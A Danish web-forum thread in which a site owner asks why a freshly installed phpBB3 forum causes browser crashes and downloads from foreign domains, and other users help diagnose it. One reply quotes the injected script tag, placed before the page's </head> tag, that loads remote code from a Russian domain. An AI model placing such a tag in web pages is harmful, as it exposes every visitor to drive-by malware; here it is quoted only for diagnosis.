Jeg har et meget dumt problem som jeg meget gerne kunne tænke mig at få løst. Det drejer sig om at jeg har installeret et forum ( phpBB3 ) på min spritnye hjemmeside som der er hosted på en one.com server.
Hvis nogen der tør så kan I prøve at besøge mit forum lejentroll.dk
Forleden dag stod der at man downloader noget fra freeholidaymart.com og i dag står der at man downloader noget fra remania.ru - der plejer at ské to forskellige ting når jeg klikker ind på min hjemmeside, enten crasher browseren, eller også virker det fint, men åbenbart kører der noget i baggrunden som man ikke kan se - det er meget mærkeligt efter min mening.
Nogen der idéer til hvad det er der er galt? Jeg er ikke så meget inden i det med det tekniske men jeg syntes selv at jeg har gjort præcis hvad der stod i brugsvejledningen.
Jeg arbejder som reklameopfinder, og jeg kører med 12.000 kr/t. Skal du have et lift med?
Jeg har besøgt din side lejentroll.dk, og på selve forsiden er ikke konstateret virus. Er du sikker på, at det ikke er din egen computer, som er inficeret?
OnlineSynlighed.dk | Søgemaskineoptimering (SEO), Google Ads, Facebook Annoncering og Online Reputation Management. Kontakt os på mail@onlinesynlighed.dk eller telefon +45 70 13 63 23 Find mig på LinkedIn
John, hvis du Googler siden, kan du se at det anses som et "website der kan beskadige din computer". Så der må være et eller andet på siden, som får Google til at reagere.
Det behøver dog ikke at betyde, at der faktisk er virus på sitet.
OnlineSynlighed.dk | Søgemaskineoptimering (SEO), Google Ads, Facebook Annoncering og Online Reputation Management. Kontakt os på mail@onlinesynlighed.dk eller telefon +45 70 13 63 23 Find mig på LinkedIn
John, hvis du Googler siden, kan du se at det anses som et "website der kan beskadige din computer". Så der må være et eller andet på siden, som får Google til at reagere.
Michael, hvor hentede du forummet henne?
Hej Michael Grove
Jeg har hentet det fra http://www.phpbb2.dk/forum/ - jeg har søgt i deres forum og på nettet, og jeg har ikke fundet nogen indlæg / oplysninger om andre der har haft det samme problem ( har heller ikke brugt så meget tid på at søge kun ca 30 min ).
Jeg arbejder som reklameopfinder, og jeg kører med 12.000 kr/t. Skal du have et lift med?
Det der skaber problemet er denne linie lige inden </head> tagget: "<script
src="http://remania.ru/Library/news-17.php"></script>" - Jeg er ikke så god til russisk, så kan ikke lige se hvad det handler om
Jeg har besøgt din side lejentroll.dk, og på selve forsiden er ikke konstateret virus. Er du sikker på, at det ikke er din egen computer, som er inficeret?
Min computer har muligvis virus, men det er underligt at du ikke kan se virusen. Lars Meyer kunne godt se den http://www.amino.dk/forums/t/87545.aspx?PageIndex=8 - når jeg besøger min forside med min iPhone så ser jeg heller ikke virusen ( Safari browser ) - så det er åbentbart nogen sårbarheder i nogen browser, eller hvad ved jeg?!
Den tekst, som Google tilføjer: "One.com is an innovative supplier of Web hosting services. We offer domain, homepage and unlimited e-mail accounts at some of the best prices on the market ..."
.. står jo slet ikke på siden.
Så mon ikke den advarsel relaterer sig til en tidligere udgave af sitet?
Jeg vil da anbefale Michael at følge anvisningen:
Hvis du er administrator af et websted, som vi har identificeret med denne advarselsmeddelelse, skal du gå til anvisningerne i Hjælp til webmastere for at løse problemet. Husk, at i visse tilfælde kan tredjepart indsætte skadelig kode på lovlige websteder, hvilket kunne få os til at vise en advarselsmeddelelse.
/John